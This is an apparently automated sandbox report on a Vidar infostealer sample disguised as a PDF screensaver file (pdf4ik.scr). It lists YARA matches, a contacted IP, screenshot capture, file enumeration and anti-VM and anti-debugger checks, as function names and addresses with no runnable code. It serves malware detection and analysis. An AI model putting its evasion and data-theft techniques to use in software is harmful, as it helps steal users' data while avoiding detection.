Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA50A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 12_2_29DA50A0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Yara signature match
Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
One or more processes crash
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
Detected potential crypto function
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBF98E 12_2_29DBF98E
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 12_2_29D90880
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D958A0 12_2_29D958A0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC1844 12_2_29DC1844
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DAC840 12_2_29DAC840
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA81A 12_2_29DBA81A
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DAEB70 12_2_29DAEB70
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC0B0C 12_2_29DC0B0C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DABA00 12_2_29DABA00
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8BC60 12_2_29D8BC60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB9C15 12_2_29DB9C15
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBAC02 12_2_29DBAC02
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DABF80 12_2_29DABF80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBFEDF 12_2_29DBFEDF
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8B1E0 12_2_29D8B1E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8C0E0 12_2_29D8C0E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA0AA 12_2_29DBA0AA
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DBA448 12_2_29DBA448
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DC0430 12_2_29DC0430
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8D7B0 12_2_29D8D7B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8A7A0 12_2_29D8A7A0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9C6C0 12_2_29D9C6C0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29D84750 appears 118 times
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29DB5A50 appears 44 times
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: String function: 29D89100 appears 66 times
Abnormal high CPU Usage
Source: C:\Program Files\7-Zip\7zG.exe Process Stats: CPU usage > 98%
Tries to load missing DLLs
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncryptsslp.dll Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C60000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C69000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D70000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D71000 page read and write Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74510000 page read and write Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577
Source: unknown Process created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C94.tmp Jump to behavior
Source: classification engine Classification label: mal80.troj.spyw.evad.winRAR@4/8@1/5
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8FA90 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 12_2_29D8FA90
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3B10 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle, 12_2_29DA3B10
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_02
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: pdf_novichki.rar Static file information: File size 6238622 > 1048576
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB5A95 push ecx; ret 12_2_29DB5AA8
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB07BE push ecx; ret 12_2_29DB07D1
PE file contains sections with non-standard names
Source: pdf4ik.scr.9.dr Static PE information: section name: .eh_fram
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Jump to dropped file
Drops PE files
Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API coverage: 7.9 %
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA2E90 GetSystemInfo, 12_2_29DA2E90
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 12_2_29D9B960
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D93B60
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_29DA4C40
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9CE80
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D96160
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 12_2_29D90130
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 12_2_29D9E060
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA, 12_2_29D8F3E0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 12_2_29D9B520
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 12_2_29D964B0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA, 12_2_29D9E470
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: )GetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: }DGetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_29DB387C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,G